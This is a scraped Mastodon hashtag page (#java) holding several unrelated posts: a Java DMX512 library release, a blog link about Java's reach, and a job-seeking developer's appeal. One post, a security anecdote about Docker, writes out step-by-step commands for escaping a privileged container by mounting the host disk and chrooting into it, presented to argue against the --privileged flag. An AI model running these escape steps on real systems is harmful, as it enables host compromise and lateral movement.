masto.es es uno de los varios servidores independientes de Mastodon que puedes usar para participar en el fediverso.
Bienvenidos a masto.es, el mayor servidor de Mastodon para hispanohablantes de temática general. Registros limitados actualmente a invitaciones.

Administrado por:

Estadísticas del servidor:

1,9 K
usuarios activos

#java

29 publicaciones26 participantes5 publicaciones hoy

Earlier this month, I released V0.0.1 of my new Java library to interact with DMX512 devices using (optionally) the Open Fixture Library (OFL). After some more experimenting, I’m able to announce the next (beta) release, V0.0.2, with code improvements, the introduction of universes, and support for a first USB-to-DMX interface!

All info:
webtechie.be/post/2025-07-29-j

Video universes:
youtube.com/watch?v=slC4niKWUq0

Video USB-to-DMX:
youtube.com/watch?v=q7T66fzsym0

webtechie.beRelease V0.0.2 of Java DMX512 Library With Universes and USB-to-DMX support | webtechie.be

Java’s Not Gone, It’s Just Hiding in Plain Sight

From powering Minecraft on the PlayStation to driving high-performance financial systems, Java remains a quiet force behind technologies we use every day.
Our latest blog takes a thoughtful look at how this long-standing language continues to make an impact, sometimes where you’d least expect it.

👉 Read more:
freebsdfoundation.org/blog/fro

Message in a bottle time again #GetFediHired (not a peep from anyone yet).

Growing desperate in search for (remote) software developer work in the #Ottawa #Montreal areas. #C C# #Erlang #Java #NodeJS #Shell #SQL #BSD #Linux #English #French and more. Very versatile, adaptable, experienced.

snert.com/resume/

Hey! If its remote, its possible to work world wide too!

www.snert.comAnthony C Howe - Snert - Curriculum VitaeCurriculum Vitae for Anthony C Howe, Software Developer

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

Dev0: Hey, this isn't working, I hate containers...
Dev1: Maybe just add the --privileged flag!

ItSec: Just… no. Simply no. No privileged mode - the grumpy fellow interjects as he walks away.

Dev0: Jesus, fine - no privileged mode.
Dev1: Okay, but… why?

Here's why (one, simple example): 

Docker's --privileged flag lifts almost all restrictions from your container - exactly the opposite of --cap-drop=ALL. Let's demo the difference. 

1) Start two containers.

docker run -itd --privileged --name ubuntu-privileged ubuntu
docker run -itd --name ubuntu-unprivileged ubuntu

2) Inspect /dev in the unprivileged container.

docker exec -it ubuntu-unprivileged bash
ls /dev
exit

You'll only see a limited set of devices. No disk access. 

3) Now inspect /dev in the privileged container.

docker exec -it ubuntu-privileged bash
ls /dev

/dev/sda exposed! Sometimes you may see /dev/mapper when LVM is in place. Then "apt update && apt install -y lvm2" and "lvscan" may help during next phase.

4) Exploitation part (inside the privileged container) - simply mount /dev/sda to any writable path in container.

mkdir /tmp/whatever
mount /dev/sda1 /tmp/whatever

5) You can now enumerate - and access - the Docker host's logical volume.

ls -la /tmp/whatever

6) If you wish, you can even chroot into the host:

chroot /tmp/whatever /bin/bash

The moral of the story is to avoid privileged mode, because in the event of an incident (e.g. an attacker compromising an app running inside a container), you significantly increase the likelihood of successful lateral movement from the container to the Docker host - and from there into the rest of your infrastructure.

Usually the grumpy guy means well. He just doesn't know how to explain it properly.